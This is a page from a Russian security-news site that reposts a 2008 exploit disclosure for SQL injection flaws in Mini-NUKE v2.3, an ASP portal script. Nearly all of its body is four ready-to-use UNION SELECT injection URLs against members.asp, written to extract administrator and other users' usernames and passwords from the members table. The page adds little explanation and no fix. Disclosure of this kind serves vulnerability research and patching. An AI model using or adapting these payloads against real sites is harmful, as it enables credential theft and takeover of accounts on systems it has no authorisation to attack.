Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Multiple Vulnerabilities in AWStats Totals

  ZoneMinder Multiple Vulnerabilities

  Crafty Syntax Live Help <= 2.14.6 SQL Injection

  Secunia Research: Calendarix Basic Two SQL Injection Vulnerabilities

From:byccc_(at)_live.com <byccc_(at)_live.com>
Date:26 августа 2008 г.
Subject:Mini-NUKE v2.3 Freehost (tr) Multiple Remote SQL Injection Vulnerabilities

Exploits

admin user name :
http://localhost/mininuke/members.
asp?action=member_details&uid=1+union+select+0,kul_adi,2,3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+seviye=1

admin password  :
http://localhost/mininuke/members.
asp?action=member_details&uid=1+union+select+0,sifre,2,3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+seviye=1

Learn username from id number:

http://localhost/mininuke/members.
asp?action=member_details&uid=1+union+select+0,kul_adi,2,3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+uye_id=1

And then you can learn the same id's password like this.

http://localhost/mininuke/members.
asp?action=member_details&uid=1+union+select+0,sifre,2,3,4,5,6,7,8,9,10,11,
12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members+where+uye_id=1

Script Downlad:
http://www.aspindir.com/goster/3543

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород